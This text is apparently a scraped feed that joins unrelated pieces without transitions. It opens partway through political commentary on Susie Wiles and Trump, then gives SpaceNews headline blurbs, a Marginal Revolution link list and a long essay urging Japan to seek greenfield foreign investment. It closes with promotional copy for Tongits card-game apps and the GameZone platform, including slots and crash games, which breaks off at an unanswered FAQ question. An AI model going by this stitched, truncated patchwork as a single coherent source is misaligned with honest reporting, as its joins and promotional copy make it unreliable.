To illustrate the first channel, it’s difficult to overstate how important Wiles is for Trump. Do you remember the last Susie Wiles drama or death watch? No. Because it’s simply never happened. No one ever stays long with Trump, but she goes way back into his period in exile as his indispensable person. (She worked for Trump in less central positions going back to 2015.) I suspect she was a big part of the relative stability of his reelection campaign and whatever counts as that stability relative to however crazier things might have been without her. I’m not saying anything new. This is a throughline in almost all the reporting on Trump since his darkest (for him) days after 2021. In a way, she became the person who could make the trains of chaos run on time. I think it is mostly that, or largely that. But I also don’t think we can separate it from that process of enervation we all see before our eyes.

But note also the other big element in these quotes released by the Vanity Fair PR machine.

If I’m not mistaken, Wiles seems to have tried to warn Trump off of his wildest and most malevolent actions. She tried. And she wants us to know she tried. Indeed, the second point is probably more certain and significant than the first. But he decided to do them anyway. And that’s fine. Because he’s the boss. But no one else but Wiles seems to have these rights written into her deal. She can tell us all about it, tell us the things all of us know but from within the MAGA politburo and on the record. She’s no Beria. She’s no Malenkov. She’s untouchable. Or at least that’s what it looks like right now. This whole thing seems like if not a declaration of independence than one of untouchability on her behalf. Trump’s my bitch. I can touch the MAGA third rail and suffer no harm.

Rocket Lab set to launch Space Force and NASA ‘DiskSat’ experiment

The STP-S30 mission will test flat, disk-shaped smallsat design for sustained operations in very low orbit

The post Rocket Lab set to launch Space Force and NASA ‘DiskSat’ experiment  appeared first on SpaceNews.

Digantara raises $50 million to expand from space surveillance to missile defense

Digantara Industries mission control center

Digantara Industries, an Indian space situational awareness company, has raised $50 million as it expands into the United States and pursues opportunities in missile defense.

The post Digantara raises $50 million to expand from space surveillance to missile defense appeared first on SpaceNews.

Speed, risk, and the future of national security space

Spacepower innovation panel

In this episode of Space Minds, host Mike Gruss moderates a timely panel discussion at the Spacepower conference on how commercial space capabilities are reshaping national security, civil space, and military decision-making.

The post Speed, risk, and the future of national security space appeared first on SpaceNews.

Max Space unveils plans for commercial space station

Thunderbird Station

Max Space, a startup developing expandable module technologies, plans to build a commercial space station that could launch on a single Falcon 9 rocket.

The post Max Space unveils plans for commercial space station appeared first on SpaceNews.

What Germany got right (and wrong) in its first ever space strategy

A photo of Europe taken by German astronaut Alexander Gerst. Credit: ESA/A.Gerst, CC BY-SA 3.0 IGO

Germany’s first national space security strategy was unveiled last month to much fanfare. And who’s surprised? It was long overdue, and puts into plain language a simple but vital truth: space is now a theatre of power. With Russia and China long having treated orbit as contested territory, and the United States preparing daily for […]

The post What Germany got right (and wrong) in its first ever space strategy appeared first on SpaceNews.

Ariane 6 launches Galileo navigation satellites

Ariane 6 launch

An Ariane 6 rocket placed two satellites for Europe’s Galileo navigation system into orbit Dec. 17.

The post Ariane 6 launches Galileo navigation satellites appeared first on SpaceNews.

OQ Technology links commercial IoT chipset to LEO satellite

Luxembourg-based OQ Technology said Dec. 17 it has connected a commercial IoT chipset directly to one of its LEO satellites, using internally developed software based on 3GPP mobile standards.

The post OQ Technology links commercial IoT chipset to LEO satellite appeared first on SpaceNews.

Lux Aeterna to land first reusable satellite in Australia

Denver-based Lux Aeterna announced plans Dec. 17 to land its debut reusable satellite at the Koonibba Test Range in South Australia, shortly after launching on a SpaceX rideshare mission in early 2027.

The post Lux Aeterna to land first reusable satellite in Australia appeared first on SpaceNews.

Wednesday assorted links

1. A listener ranks CWT episodes from this year.

2. A game-theoretic model of AI arms races.

3. Haitian gangs update.

4. GDP is underrated.

5. The economics of Jeffrey Epstein (NYT).

6. “The US Tech Force is recruiting an elite corps of engineers to build the next generation of government technology.”  Here is the web site.

7. Breakthroughs of the year.

8. Norman Podhoretz, RIP.

The post Wednesday assorted links appeared first on Marginal REVOLUTION.

       

Comments

 

FDI is the missing piece of Japan’s puzzle

Photo by Sanjo via Wikimedia Commons

My book, Weeb Economy came out in March, but only in Japanese. Half of the book was a series of translated posts from my blog, so those are already in English. The other half was a new part that I wrote in English and had translated into Japanese by my excellent translator, Kataoka Hirohito. So while I’ll eventually republish the whole book in English, what I can do right now is to publish my English-language first draft as a series of posts on this blog.

The first installment was entitled “I Want the Japanese Future Back!”. In that post, I explained why Japan now finds itself in the position of a developing country, playing catch-up with other countries. This means Japan needs to experiment with bold new strategies and development models, as it did in ages past.

In this second installment, I suggest one such experiment: a huge increase in a kind of investment called greenfield FDI. I discuss:

  • How Japan is already benefitting from greenfield FDI in a few places

  • Why greenfield FDI (a foreign company building a factory or research center in Japan) is so much more important and useful than other kinds of FDI like mergers and acquisitions

  • Why Japan needs to export a lot more to other countries, and how greenfield FDI can help do that

  • How Japan can start to welcome more greenfield FDI

  • Why Japan is an attractive destination for international investment

The Kumamoto miracle points the way

The semiconductor industry is probably the most important industry in the world. Computer chips are absolutely essential to every high-value product in a modern economy — autos, rockets, appliances, machinery, everything. They’re also of crucial military importance, in an age where precision weaponry rules the battlefield. And they’re of core importance to emerging technologies like AI — whose vast computational resources require enormous data centers — and biotech.

As a result, it’s no wonder that the world’s major economies have been fighting over the semiconductor industry for generations. In the early days, the U.S. and Japan were the clear leaders. Much of the industry involves the design of semiconductors and the production of specialized tools and materials, and in these upstream parts of the industry the U.S. and Japan are still strong. But in the most important downstream part of the process — the actual fabrication of the most advanced chips — both the U.S. and Japan have lost their lead to Taiwan:

Source: Statista

Specifically, they have lost their lead to one remarkable Taiwanese company: Taiwan Semiconductor Manufacturing Company. TSMC are essentially the world’s greatest machinists. Other companies design the chips, and other companies create the (incredibly advanced) machine tools that make the chips. What TSMC does is to buy the tools, and then use the tools with incredible ingenuity and efficiency to make someone else’s chips designs into reality. They pioneered this “pure-play foundry” business model, and it has made them rich — and it has allowed Taiwan to outcompete the chipmaking industries of every other country on the planet.

Since the pandemic, the global battle to win semiconductor market share has intensified, due to the advent of AI and to the geopolitical competition between China and the democratic countries. Japan, like many countries, is trying to build its own foundry business, in the form of Rapidus, a joint venture between a bunch of Japanese companies that’s also getting some help from IBM. But — also like in the U.S. there’s also a second, parallel effort afoot. Japan is building chips for TSMC.

In late 2021, TSMC created a Japanese subsidiary called Japan Advanced Semiconductor Manufacturing (JASM), and started building two fabs in Kumamoto prefecture. Sony and Denso pitched in to help. So did the Japanese government, providing billions of dollars in subsidies and offering TSMC logistical assistance in finding local workers and ensuring adequate water and other infrastructure. The first plant was completed very quickly, and opened in February 2024; the second is expected to open in 2025. Now TSMC is considering a third fab in Kumamoto, producing even more advanced chips, to be opened in 2030.

Observers have been impressed with the speed with which the fab was built, comparing it favorably to TSMC’s plant in America, which initially suffered delays. TSMC credited the successful construction to a variety of local supporting institutions — “suppliers, customers, business partners, government and academia.” TSMC’s founder Morris Chang, who once poked fun at Japan for the slow speed of its business dealings, has now become a true believer in the revival of the country’s chip industry. At the opening of the first TSMC plant in Kumamoto, Chang predicted a “renaissance of semiconductors” in Japan.

And Japan isn’t stopping with TSMC. Micron, an American chip company, is building a fab in Hiroshima, bringing some of its best technology into the country. Samsung is building a semiconductor development center in Yokohama. Both of these investments are being done with significant help from the Japanese government, and involve cooperation with Japanese companies and universities.

These investments by foreign companies aren’t Japan’s only strategy for reviving its semiconductor industry — they coexist alongside homegrown efforts like Rapidus, as well as Japan’s upstream efforts in the chipmaking tool and materials industries. But they represent a crucial addition to the purely indigenous efforts. This is an example of multi-strategy development at work.

But it’s far from the only such example.

A school of AI fish

The artificial intelligence boom is the most important trend in the software industry right now. Whether this remains true in future years remains to be seen, of course, but the capabilities of large language models like ChatGPT, AI art software like Midjourney, and computer vision systems are undeniable. Even if there’s a bubble and bust in the field at some point — as there was with dot-com companies in 2000 — AI is going to be important in the long term.

Japan largely missed out on the internet software boom — the country has no internationally dominant consumer internet giants like Google or Facebook, and its B2B software industry was hampered by Japanese companies’ slowness to adopt IT solutions in past decades. But the AI age is a new dawn, and Japan has another shot at building a powerful software industry.

At the time of this writing, one of the most interesting AI startups in Japan is Sakana AI. Currently, AI applications generally use one large statistical model to generate text, create images, recognize objects, predict the shape of a protein, etc. Sakana tries to instead use groups of smaller models to accomplish the same thing. In addition to being able to do some things better than big models, these groups of smaller models may use much less electric power — an important consideration, when AI’s energy needs are skyrocketing.

Sakana AI has three founders. There’s Llion Jones, originally from Wales, who was one of the authors of the groundbreaking 2017 research paper that discovered the algorithm now used to make LLMs. There’s David Ha, originally from Canada, who was an AI researcher at Google Brain. And there’s Ito Ren, a Japanese former diplomat who was an executive at the e-commerce company Mercari.

The company’s investors are equally international — it includes American venture capital firms like Khosla Ventures, Lux Capital, and New Enterprise Associates, the American semiconductor giant Nvidia, and a large assortment of Japanese banks and technology companies. Sakana’s most recent funding round raised $214 million, and valued the company at $1.5 billion.

That’s not a huge valuation compared to U.S. giants like OpenAI ($150 billion) or Anthropic (possible valuation of $40 billion). But Sakana’s presence has put Japan on the map as a potential hotspot for international AI investment. Nvidia, for example, has declared its intention to create an R&D center in Japan. OpenAI has opened a branch office in Tokyo. Oracle is investing $8 billion over the next decade in AI and cloud computing in Japan. This is in addition, of course, to all the big cloud providers — Amazon, Microsoft, and Google — looking to invest in Japan in order to serve the Japanese market.

Then there’s Spellbrush, a U.S. startup that has a partnership with the AI art and design company Midjourney. Spellbrush uses generative AI to create Japanese-style anime art — one of the most popular and lucrative applications for AI so far. Spellbrush recently opened a branch office in Tokyo’s Akihabara neighborhood.

Japan is still behind the U.S. and China in AI, but investments like these keep it in the game.

It’s important to note that although Sakana AI might succeed, the most likely outcome is that the company will fail. This is true because most startups fail in general, and because in a rapidly changing new industry like AI, the failure rate is likely to be even higher. In fact, the entire AI industry may be headed for a significant bust, like the dotcom crash in 2000.

But this shouldn’t negate the importance of Sakana, or of the Japanese AI boom in general. First of all, though most startups fail, the few that succeed often grow very large and important — venture investing is about accepting many failures in order to find a few huge wins. The investment and attention that Sakana draws to the Japanese AI startup scene will help make sure that some of those successes happen in Japan. Even a general AI bust will likely only be a temporary setback to the industry, as with the dotcom crash and the subsequent recovery.

Second, even failed startups often contribute crucial innovation to a country’s ecosystem. Fairchild Semiconductor wasn’t successful, but it pushed the envelope of semiconductor technology forward, and some of its alumni went on to found Intel. General Magic tried and failed to invent the smartphone in the 1990s, but its alumni went on to help create the iPhone.

And third, Sakana sends a signal that Japan is a viable destination for international investment in the software industry in general, well beyond AI. Japan is generally weak in most areas of IT, including B2B solutions, consumer internet companies, and cloud computing providers. As in semiconductors, a wave of foreign entrepreneurs and foreign funding could help Japan shore up its weak spot in software.

The most important kind of FDI

The chipmaking projects by TSMC, Micron, and Samsung, the U.S. VCs’ investment in Sakana AI, and the branch offices of companies like OpenAI are all examples of foreign direct investment, or FDI. But they’re not the only type, and when people talk about FDI, they often mean something very different. In fact, it’s actually a bit of a confusing term, because it encompasses multiple unrelated categories of investment. FDI includes:

  • Cross-border real estate purchases

  • Acquiring a foreign company (M&A)

  • Building a branch office or factory in a foreign country (“greenfield” investment)

Most writers who advocate for Japan to increase FDI focus on the second of these. They believe that allowing more foreign acquisition of Japanese companies will improve these companies’ productivity by transferring foreign management techniques.

I am agnostic concerning this argument. I recognize that Japan’s policymakers and businesses have many reasons for resisting foreign acquisitions, both as part of the country’s development strategy and part of its social policy. Foreign buyers might downsize Japanese companies by firing large numbers of employees, which would hurt Japan’s corporation-centric social welfare model. They might strip-mine Japanese companies for their technology or other assets and then sell them off as husks of their former selves, as happens all too often with leveraged buyouts in the United States. Or they might simply neglect their Japanese acquisitions until they stagnated.

Instead, my argument is that Japan should focus specifically on increasing and promoting greenfield FDI — foreign companies building their own branch offices and factories in Japan. And in particular, Japan should encourage greenfield platform FDI, in which a foreign company builds factories or offices in Japan in order to create goods and services that are then exported from Japan to a third country. TSMC’s chip fabs in Kumamoto are an example of greenfield platform FDI.

This particular kind of FDI offers a lot of benefits that foreign takeovers don’t. For one thing, greenfield FDI usually directly adds to the economy — when a foreign company builds a factory in Japan, or even just purchases office equipment for a new office, that represents real money that goes directly into Japanese people’s pockets. And greenfield FDI inevitably results in the hiring of more Japanese workers, since someone has to work at the new factory or office branch.

Investment spending and workers’ salaries in turn stimulate the surrounding local economy — already, Kumamoto is experiencing an economic boom. Note that M&A doesn’t necessarily accomplish any of this — it just changes ownership of existing businesses, without requiring any new investment, hiring, or spending on the local economy.

And greenfield FDI is also more likely to be received warmly by the Japanese public. Ito, Tanaka, and Jinji (2023) find that Japanese people feel more positively about greenfield FDI than about foreign acquisitions:

This study empirically examines the determinants of individuals’ attitudes about inward foreign direct investment (FDI) using responses from questionnaire surveys that were originally designed. Individuals’ preferences for inward FDI differ between greenfield investments and mergers and acquisitions (M&A), and people are more likely to have a negative attitude toward M&A than greenfield investments. People with a negative image of the so-called “vulture fund” for foreign capital tend to oppose inward FDI, and this is more pronounced for M&A than greenfield investments.

On top of all this, greenfield platform FDI has a very good economic track record. It has been key to the economic success of a number of developing countries — most notably China, but also Poland and Malaysia.

After China’s entry into the World Trade Organization in 2001, companies from around the world flocked there to set up factories — both to sell their products to a billion newly available Chinese consumers, but also to exploit what at the time were cheap Chinese labor, land, energy, and capital costs, in order to make products for export to the rest of the world. This is known as “platform FDI”.

Poland executed a similar strategy on a smaller scale, becoming a factory floor for European nations — especially Germany — looking for lower costs and more friendly regulation. Malaysia became a center of electronics manufacturing, with investments from the U.S., Singapore, Japan, and elsewhere. In both of these cases, the products of foreign-owned factories were largely sold abroad, since both Poland and Malaysia have relatively small domestic markets. FDI thus helped to make China, Poland, and Malaysia into export powerhouses.

Japan, of course, is in a very different economic situation than China, Poland, or Malaysia were in the 2000s. But it can still learn from their successes. In addition to the direct benefits for investment and employment, greenfield platform FDI offers two main advantages: it can increase a country’s exports, while also facilitating technology transfer. In its current economic situation, Japan could use a whole lot of both of these things.

Japan needs exports

Americans often think of Japan as an export powerhouse, because of the international success of brands like Toyota, Honda, Sony, and Panasonic. And during the early days of the postwar miracle, Japan’s bureaucracy did strongly encourage exports, in order to earn precious foreign currency. But in fact, this lingering stereotype is badly mistaken — Japan has never really been an export-oriented economy like Germany or South Korea. It’s a domestically focused economy, more like the United States:

Source: World Bank

As Chalmers Johnson recounts in MITI and the Japanese Miracle, this inward focus was part of Japan’s development model in the 1960s. MITI found that ensuring cheap bank loans to domestic companies, and promoting competition in the domestic market, was a way to quickly boost Japan’s investment rate and its capital stock. And they found that this approach also ensured an adequate level of exports, since Japanese companies would produce more than they could sell in the domestic market, and export the excess capacity overseas.

Now, Japan finds itself badly in need of exports. The first reason is that exports help increase the value of the yen, making Japanese people richer as a result.

Japan’s currency has weakened dramatically against the dollar and other world currencies. This is partly because of Japan’s low interest rates relative to other rich countries, which is driven by Japan’s low inflation (and probably by a need to keep Japanese government borrowing costs low, in order to make Japan’s very large government debt sustainable).

As a result of the weak yen, Japanese people are finding it increasingly difficult to afford imports. Japan imports most of its food and energy, so the weak yen is increasing the cost of daily life. Japanese companies are having trouble importing the parts and materials they need, as well as energy. The Japanese government has been forced to intervene to prop up the value of the yen. But such interventions can’t last forever, since they require selling off foreign assets — eventually, the government runs out of foreign assets to sell, and the currency crashes even more.

An increase in global demand for Japanese exports can help increase the value of the yen. This is because in order to buy Japanese goods and services, foreigners need to swap their currencies for yen. This increases the demand for the yen, which pushes up its value. The more exports Japan sells, the stronger the yen becomes. Ultimately, Japan’s currency problem probably can’t be fixed by exports alone — financial outflows will have to be addressed as well. But exports help.

The second reason for Japan to focus on exports is that the domestic Japanese market is shrinking. Japan’s population is forecast to fall substantially over the remainder of this century:

Mass immigration may slow this trend, and measures to increase the birth rate may eventually manage to reverse it. But whether that will ever happen is unknown, and even if it does, Japan will not be a major growth market for a long while. This means there is much less incentive for companies — Japanese or foreign — to invest in Japan in order to serve the domestic market than in the past. Less investment also means less spending on R&D, which causes Japan to fall behind technologically.

Exporting can help reduce this problem, or even solve it. The more Japan becomes an attractive platform for export production, the more reason there is for Japanese companies and foreign companies to invest in Japan, including investments in R&D and new technologies. This will help increase productivity.

Finally, the activities required to increase exports may improve productivity. There’s a lot of research on “learning by exporting” — entering foreign markets could teach Japanese engineers, product designers, and managers how to produce things that foreigners want to buy. This could help counter the so-called “Galapagos syndrome” — the tendency of Japanese product standards to drift away from international standards, shrinking the markets available to Japanese companies.

Another way to put this is that exporting allows companies based in Japan — whether domestically owned or foreign-owned — to achieve scale without exacerbating competition that drives down prices.

Greenfield platform FDI — like TSMC’s fabs in Kumamoto or American venture capitalists’ investment in AI startups in Tokyo — can help Japan become more of an export powerhouse. Okubo, Wagner, and Yamada (2017) find that foreign-owned factories in Japan tend to export more — and also to innovate more. Their explanations for the difference have to do with corporate governance and culture, and with the pool of employees that foreign-owned companies are able to hire. They write:

Foreign ownership may play a role in risk-taking choices of companies – such as exporting and innovating – for various reasons. It can provide companies with more information about the outside market, especially in the context of small and medium enterprises. Foreign owners may be keen on getting high returns on investment and may tolerate a higher risk level. Firms with foreign ownership may have greater access to funds. Also, firms that do allow foreign ownership may experience a more open corporate culture than firms that do not, and such open culture may facilitate risk-taking.

The simplest explanation here is that multinational companies — especially those with foreign employees — simply know a lot more about global markets. TSMC knows what kind of computer chips Nvidia and Apple want to buy. Sakana AI’s founders keep in touch with the American AI market, and understand what kind of capabilities U.S. companies want from AI models. And so on.

In other words, greenfield platform FDI is a perfect example of multi-strategy development. It means that instead of coming into Japan to compete with local companies in the Japanese market, foreign companies are helping Japan sell a bunch of new products to a bunch of new overseas customers.

The intangible benefits of FDI

Japan’s low levels of productivity are somewhat of a mystery to researchers. Nakamura, Kaihatsu, and Yagi (2018), a trio of researchers from the Bank of Japan, arrive at the frustrating conclusion that the biggest problem is a lack of “intangible assets” at Japanese companies. These are any non-physical assets — brand reputation, patents, software, long-term customer relationships, management know-how, worker skills, tacit technical know-how, and so on.

This is such an enormously broad and heterogeneous category, and so many of its components are hard to measure, that “intangible assets” basically ends up becoming a label for economists’ ignorance about what makes some companies more valuable than others. For example, Nakamura et al. note that Japanese companies spend quite a lot on R&D, but don’t seem to get nearly as much value for their spending as U.S. companies do.

So the mystery remains a mystery. But even if we don’t quite know what the most important intangible assets are, we still might be able to help companies get more of them. Nakamura et al. suggest a fairly standard, reasonable list of approaches — increasing labor mobility, improving corporate governance, allowing more lagging companies to fail, and improving the venture capital ecosystem. These are all reasonable approaches, and — as we saw above — they’re all things that Japan is already trying to some greater or lesser degree.

But there’s one strategy that seems to be flying a bit under the radar here: FDI. When foreign companies put their factories, offices, and research centers in Japan, they bring many intangible assets with them — foreign management techniques, technical tricks and know-how, connections to customers and suppliers in other countries, and so on. And these can, for the most part, be pretty easily transferred to Japanese companies.

One way, which has been thoroughly documented by researchers, is through interactions with local suppliers. When a company like TSMC puts a semiconductor fab in Japan, one reason is so that it can buy a bunch of specialized tools and components from Japanese suppliers — like the photoresist that Japanese companies are so famous for. This in turn teaches Japanese suppliers what the leading chip companies need and how to best serve them, as well as details about how the best chipmaking tools work. Those kinds of knowledge are both intangible assets.

Another way ideas spread is through job-switching. TSMC’s fab is going to employ a bunch of Japanese workers. Those workers are going to get the chance to learn how to make chips from the very best in the business. If some of them eventually leave to go work at Japanese semiconductor companies, they’ll take all that knowledge with them. This sort of knowledge transfer would have been harder in the old days, when Japan was still under the lifetime employment system. But now, with mid-career hiring on the rise, it’s very likely.

Let’s imagine an example of how this might work. Suppose you’re a Japanese AI researcher at a domestic AI startup. You and your team know a lot about AI models, from reading research papers, from building them yourself, and maybe from going to some conferences overseas. But for some reason your models aren’t quite as good as foreign companies’ models. The foreigners must have a bunch of little tricks they use to make things work better.

Then one day your company hires another researcher who worked at Sakana AI. Your new colleague knows a lot of those tips and tricks for making models work more smoothly, from having worked with some of the top researchers at Sakana. And their time at Sakana also gave them personal connections with a bunch of other researchers overseas, whom you can now call up and ask for help solving your model’s problems.

Congratulations! You’ve just transferred tacit knowledge for free. Your company’s intangible assets have increased.

If this example sounds contrived, consider how many of Japan’s most famous inventions came through interaction with foreigners and absorption of foreign knowledge. Japan’s Canon cooperated with America’s Hewlett Packard in the 1980s to create laser printers. Yamaha created the digital synthesizer with the help of a Stanford engineer named John Chowning. The famous inventor Sasaki Tadashi licensed American patents to help him invent the first commercially viable pocket calculator.

Those are all examples from the book We Were Burning. In other words, in the 20th century, close links between Japan and the U.S. created a vibrant international research community, where ideas flowed back and forth across borders and across companies.

In fact, there’s evidence that this is a consistent pattern when it comes to FDI. Todo (2006) and Kozo (2006) both find that FDI consistently leads to positive productivity spillovers to the country that receives the investment, and that these spillovers are closely related to R&D spending.

Observers of the Japanese economy have noted with dismay how it seems to be losing human contact with other developed economies. Few Japanese people study abroad these days, and those that do tend to go only for a very short period of time. The number of Japanese young people who want to work abroad has diminished. Collaboration between Japanese scientists and their foreign counterparts has decreased, contributing to a decline in Japan’s high-quality research output. Even as the international research community has grown larger, Japan has been pulling away from it.

Greenfield FDI can help counter that increasing insularity, by bringing foreign researchers and managers into Japan, where Japanese people can absorb their knowledge without leaving the country.

Japan is welcoming the right kind of FDI, but it can do more

Why has greenfield FDI in Japan traditionally been very small? In the early days of its postwar miracle, Japan restricted all kinds of FDI for protectionist reasons, in order to reserve the domestic market for Japanese companies that were still in their early growth stages. This was a typical policy for the time, and not dissimilar from the “infant industry” protections used by the U.S. in its early development.

From the late 1960s through the early 1970s, Japan significantly liberalized its restrictions on FDI. There were still many institutional barriers to foreign acquisitions, mostly resulting from a combination of Japan’s financial and corporate governance systems, and from cultural resistance. But although foreign companies should, in theory, have had an easier time doing greenfield M&A from the 1970s onward, few took the plunge. There are lots of possible reasons for this — force of habit, regulatory differences between countries, cultural differences, and a general stereotype of Japan as a protectionist economy. But the most important reason was probably that unlike countries like China, Poland, or Malaysia, Japan simply didn’t try to actively encourage foreign companies to use it as a production base.

Since 2003, though, the situation has slowly changed. Former Prime Minister Koizumi Junichiro called for more FDI into Japan. Regulations were eased a bit, and tax incentives were put in place. These efforts were minor and halting at first, but have gathered strength over time. Targets have become much more ambitious — in 2023 the government set a goal of attracting 100 trillion yen of FDI (about $690 billion as of this writing) by 2030. Politicians now talk regularly about the need to boost FDI. Immigration laws have been changed to make it much easier for skilled professionals to get permanent residency. There is a new Council for the Promotion of Foreign Direct Investment in Japan, and various other government efforts to attract FDI.

And amazingly, the plan seems to be working. In 2022, net FDI inflows to Japan were very slightly greater as a proportion of the economy than in either China or South Korea:

And encouragingly, greenfield FDI seems to be powering this rise. The number of inbound M&A deals has held steady, while greenfield projects have soared:

Source: JETRO

And since the semiconductor industry is powering this rise, it’s likely that a significant amount of this will result in exports.

But although this is good progress, Japan could do a lot more on the FDI front. First of all, 1.1% of GDP per year is a big improvement, but it’s not really big enough to be transformational — Poland gets over 5%, France gets 3.8%, and the U.S. gets 1.5%.

Second, most of Japan’s greenfield FDI is in one single industry — semiconductors. If Japan could attract similar levels of investment in other sectors, it would be insured against a sudden downturn in the chip industry, and it would have the chance to build up its technological muscle along a wider front. There are plenty of other high-value industries where Japan could be a high-tech, low-cost production platform — aerospace, biopharma, batteries, and electronics being four obvious examples.

In other words, Kumamoto, Sakana AI, and the other examples above are an important proof of concept for a golden age of Japanese FDI, but they should be only the beginning.

Why do foreigners invest in Japan?

Traditionally, the reason a few foreigners wanted to invest in Japan — either through greenfield investments or M&A — was to tap the large and lucrative Japanese market. That motivation still remains to some extent, but it’s growing weaker every day. But there are a number of reasons Japan is increasingly attractive as an export platform. Understanding these reasons is absolutely crucial for Japanese government officials and businesspeople who want to attract more FDI — if you’re selling something, you must understand why your customers want to buy it.

The most obvious selling point is the weak yen. A cheap Japanese currency makes anything produced in Japan more competitive in world markets. On top of that, decades of stagnant real wages have a silver lining — they’ve made Japan’s skilled workforce look relatively cheap. A third strong point is Japan’s deep network of high-quality suppliers.

There’s also the national security angle. As China’s foreign policy has become more aggressive, the U.S. and other developed nations have begun to try to move them out of China. The U.S. government calls this “friendshoring”, while companies call it “de-risking”, but the principle is the same — no one wants to be caught dependent on Chinese manufacturers for critical high-tech products if a war breaks out. Japan is an obvious alternative production base — it’s smaller and more expensive than China, but infinitely more secure. And unlike China, Japan will not use espionage to steal foreign companies’ intellectual property.

Even Germany, which has traditionally been more willing than other Western countries to invest in China, is beginning to get nervous; a significant number of German companies are looking to switch to Japan. And the U.S. Department of Defense is planning to develop advanced weapons in Japan, as well as manufacturing more traditional munitions there.

Yet another advantage — which Japanese people may not fully appreciate, since they’ve never had to deal with the alternative — is Japan’s efficient government. In many Western countries, environmental review laws and other poorly crafted regulations have turned land use into a nightmare — projects that pass all relevant environmental and safety regulations still have to endure years of lawsuits and court-enforced paperwork, making it hellishly expensive and time-consuming to build factories. The U.S., the UK, and other anglophone countries, which rely on the courts to adjudicate environmental regulation, have become especially hostile to development.

Japan’s more sensible and efficient system, which relies more on bureaucrats than on the court system, preserves some role for community input, but allows construction projects to be approved in a timely manner. Japan’s willingness to build, meanwhile, has left it with plenty of high-quality infrastructure — and the ability to create more quickly to suit the needs of foreign investors if necessary.

But there’s one more huge reason that foreigners want to invest in Japan, which could ultimately be more important than all the rest combined. And it’s a factor that, in my experience, very few Japanese people — including the government officials tasked with promoting FDI — yet appreciate.

The key is that people around the world really love Japan, and want to live there.

(In Part III, I’ll explain why so many people in the world want to live and work in Japan — and how Japan can leverage this soft power to supercharge its FDI sector.)


Subscribe now

Share

Best Free Tongits Game Online Platforms for 2025

Tongits has long been a pillar of Filipino card culture. With the rise of digital gaming, this traditional pastime has found a natural home online. Tongits game online platforms now offer players the ability to enjoy the game without needing to be there physically.

Online play provides convenience and introduces flexibility. Players can engage in quick matches, practice hand management repeatedly, and experiment with strategies at their own pace.

Beginners benefit from in-app tutorials and interactive hints, while seasoned players can sharpen their timing and observation skills. The freedom to pause, resume, or join new tables at will makes online Tongits more adaptable than ever.

Many platforms are free-to-play, lowering the barrier for newcomers and providing consistent practice opportunities for veterans. Social features such as chat, clubs, and gifting systems help recreate the communal feel of traditional games.

Whether you’re looking to practice, compete casually, or engage with a broader community, online platforms make Tongits accessible and enjoyable for everyone.

Below are three leading free Tongits game online platforms in 2025, each designed to offer a unique balance of gameplay, strategy, and social interaction.

Tongits Go: The Most Popular Tongits Game Online

Tongits Go emphasizes social interaction while offering a wide variety of games. Designed for players who enjoy dynamic sessions, it blends fast matchmaking with community features that make every match engaging.

Its colorful interface, live chat, and club system create a social environment reminiscent of traditional card tables.

Beyond Tongits itself, Tongits Go provides additional card, casual, and classic games. The platform encourages exploration, allowing players to try multiple game types without leaving the app.

Quick matches and responsive controls make the app suitable for both short breaks and extended sessions.

Tongits Go Games
Category Games Available
Card Games Tongits, Super Tongits, Pusoy, OFC (Open-Face Chinese), Poker, Pusoy Dos, Lucky 9, 8 Rummy
Casual Games Joker, Sabong, Pool, Mines, Crash, Slots
Classics & Others Mahjong

The app also supports gradual skill development. Fast-paced gameplay, combined with immediate feedback, helps players learn hand management, timing, and strategy through repetition.

Achievements and seasonal events provide incentives to continue playing regularly, keeping the experience fresh and rewarding even without spending money.

For players seeking a mix of social engagement and flexible online gameplay, Tongits Go offers a lively and comprehensive Tongits game online environment.

Tongits Star: A Competitive Alternative

Tongits Star is tailored for players who prioritize strategy and skill. Its clean, minimal interface allows users to focus on gameplay without distractions.

Responsive controls and carefully curated game modes reinforce a competitive experience where observation and timing are critical.

Rather than offering a broad selection of games, Tongits Star features a focused lineup that supports long-term skill development.

By providing leaderboards and ranking systems, the app lets players measure improvement over time, rewarding consistent performance over luck.

This makes Tongits Star ideal for methodical players who enjoy testing and refining their strategies.

Tongits Star Games
Category Games Available
Card Games Tongits, Pusoy, Remi, Poker, Pusoy Dos, Lucky 9
Casino-Style Games Bingo, Sicbo, Joker, Slots, Mines, Crash
Casual/Skill Games 8 Ball

The app’s free-to-play model ensures that progression is determined by skill, not spending. Players can focus on improving decision-making, predicting opponents’ moves, and maintaining strategic consistency.

By combining a competitive structure with a distraction-free interface, Tongits Star delivers a refined Tongits game online experience for those who value mastery.

Tongits ZingPlay: A Straightforward Option

Tongits ZingPlay takes a minimalist approach, emphasizing the game itself rather than additional features.

Its interface is clean, the pacing deliberate, and the controls precise, creating an experience that mirrors traditional play while benefiting from digital convenience.

This simplicity makes ZingPlay particularly effective for practice. Players can focus on reading discards, anticipating opponent moves, and managing risk without distractions.

Beginners can learn foundational strategies, while experienced players can enjoy uninterrupted matches that reward attention and timing.

Core Features of ZingPlay

  • Classic Tongits gameplay
  • Minimalist interface for focus
  • No flashy bonuses or extraneous menus

By stripping down the interface and maintaining gameplay integrity, ZingPlay demonstrates that online Tongits can remain engaging and skill-driven, proving that sometimes less truly is more.

Want a Competitive Tongits Game Online? Play on GameZone.

GameZone elevates Tongits online by combining professional management, real-time matches, and a secure gaming environment.

Players can enjoy Tongits alongside Filipino favorites like Pusoy and Color Game while benefiting from structured matchmaking and fair play systems.

The platform integrates responsible gaming features such as time limits, deposit controls, and self-exclusion options.

Community features and organized events help maintain engagement, transforming casual play into an ecosystem where progress, connection, and competition coexist.

Whether players are practicing, competing, or socializing, GameZone ensures that the experience is balanced, culturally authentic, and enjoyable.

It offers a natural next step for those ready to move beyond free apps and into a professionally managed Tongits game online environment.

GameZone isn’t just about winning matches but about embracing the culture of Filipino card games in a modern space. Whether you’re honing skills, connecting with friends, or exploring new strategies, the platform makes every session meaningful.

Online Tongits has evolved into more than a pastime; it’s now a community, a classroom, and a stage for strategic play, all rolled into one.

FAQs

Q: What does “Tongits game online” mean?

A: It refers to digital platforms where Tongits is played over the internet, allowing players to compete in real time using mobile or online applications.

Q: What is the objective of Tongits?

A: The goal is to reduce your hand through valid melds or call “Tongits” when your remaining cards give you an advantage.

Q: Is Tongits Go free to play?

A: Yes. Tongits Go allows players to join matches without payment, with optional in-app purchases available.

Q: What type of players is Tongits Star best for?

A: Tongits Star is ideal for players who enjoy competitive play, rankings, and strategy-focused matches.

Q: Are Tongits game online apps safe to use?

A: Reputable platforms offer secure systems and fair play mechanisms, especially professionally managed environments like GameZone.

Q: Where can I play Tongits online competitively?
